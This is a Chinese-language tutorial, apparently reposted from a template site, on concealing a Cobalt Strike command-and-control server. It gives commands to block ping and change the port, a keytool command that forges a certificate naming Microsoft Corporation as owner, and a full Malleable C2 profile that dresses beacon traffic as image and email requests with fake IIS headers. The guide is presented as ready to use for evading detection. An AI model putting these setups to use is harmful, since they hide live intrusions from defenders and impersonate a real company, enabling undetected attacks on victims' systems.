目录
1.禁ping
2. 端口号
3.证书
4.流量混淆
5.CDN
一,禁止ping动作
命令: vim /etc/sysctl.conf #打开文件编辑
添加一行: net.ipv4.icmp_echo_ignore_all = 1
保存刷新: sysctl -p
二,特征端口号更改
编辑: teamserver #直接编辑cs内这个文件,修改host
三,修改cs默认证书
keytool -keystore keyname.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias test.tk -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US" #创建证书
keytool -importkeystore -srckeystore keyname.store -destkeystore keyname.store -deststoretype pkcs12 #修改证书标准并应用
-keystore 生成的store名
-storepass 指定更改密钥库的存储口令
-keypass 指定更改条目的密钥口令
-keyalg RSA 指定算法
-alias 自定义别名
-dname 指定所有者信息
|:--------😐 -------------😐
使用命令: keytool -list -v -keystore keyname.store 可查看证书内容
修改teamserver 文件里面的keyname.store,把里面的key文件名和key密码改了。
然后就可以正常启动了。文章来源:https://www.toymoban.com/news/detail-838422.html
四,流量混淆
修改Beacon与cobalt strike通信时候的流量特征,创建一个c2.profile文件(名字任意)。
模板项目地址:https://github.com/threatexpress/malleable-c2文章来源地址https://www.toymoban.com/news/detail-838422.html
https-certificate {
set keystore "new-name.store"; #证书名字
set password "123456"; #证书密码
}
#以上没有配置cloudflare的时候可以先不写
http-get {
set uri "/image/";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
header "Referer" "http://www.google.com";
header "Host" "apex1.tk"; #域名,还没有配置cloudflare的时候这一行注释掉
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
metadata {
netbios;
append ".jpg"; # 传输内容自动追加的后缀
uri-append;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64; # 加密方式(base64、base64url、netbios、netbiosu)
print;
}
}
}
http-post {
set uri "/email/";
client {
header "Content-Type" "application/octet-stream";
header "Referer" "http://www.google.com";
header "Host" "apex1.tk"; #域名,还没有配置cloudflare的时候这一行注释掉
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
id {
netbiosu;
append ".png";
uri-append;
}
output {
base64;
print;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64;
print;
}
}
}
到了这里,关于cs(cobaltstrike)隐藏特征的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!